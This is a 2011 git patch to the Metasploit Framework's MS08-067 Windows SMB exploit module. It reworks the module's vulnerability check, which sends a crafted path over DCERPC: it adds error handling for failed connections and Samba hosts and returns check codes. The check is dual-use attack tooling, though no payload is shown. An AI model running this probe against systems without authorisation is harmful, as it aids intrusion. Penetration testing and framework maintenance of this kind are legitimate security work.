From b5e0962e3e4be0232a553776be58fbe9f1bd13cf Mon Sep 17 00:00:00 2001
From: James Lee <James_Lee@rapid7.com>
Date: Wed, 13 Apr 2011 23:26:07 +0000
Subject: [PATCH] return the appropriate check codes instead of just printing
 stuff.  add some error checks to avoid stack traces against samba and
 non-existant hosts

git-svn-id: file:///home/svn/framework3/trunk@12314 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/smb/ms08_067_netapi.rb   | 30 +++++++++++++------
 1 file changed, 21 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index 0351705015..2d8dc92815 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -957,8 +957,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		connect()
-		smb_login()
+		begin
+			connect()
+			smb_login()
+		rescue Rex::ConnectionError => e
+			print_error("Connection failed: #{e.class}: #{e}")
+			return
+		end
 
 		#
 		# Build the malicious path name
@@ -977,7 +982,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
 			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
 		)
-		dcerpc_bind(handle)
+
+		begin
+			# Samba doesn't have this handle and returns an ErrorCode
+			dcerpc_bind(handle)
+		rescue Rex::Proto::SMB::Exceptions::ErrorCode
+			return Msf::Exploit::CheckCode::Safe
+		end
 
 		print_status("Verifying vulnerable status... (path: 0x%08x)" % path.length)
 
@@ -992,16 +1003,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		resp = dcerpc.call(0x1f, stub)
 		error = resp[4,4].unpack("V")[0]
 
-		if (error == 0x0052005c) # \R :)
-			print_status("System is vulnerable.")
-		else
-			print_status("System is invulnerable (status: 0x%08x)" % error)
-		end
-
 		# Cleanup
 		simple.client.close
 		simple.client.tree_disconnect
 		disconnect
+
+		if (error == 0x0052005c) # \R :)
+			return Msf::Exploit::CheckCode::Vulnerable
+		else
+			print_status("System is not vulnerable (status: 0x%08x)" % error) if error
+			return Msf::Exploit::CheckCode::Safe
+		end
 	end
 end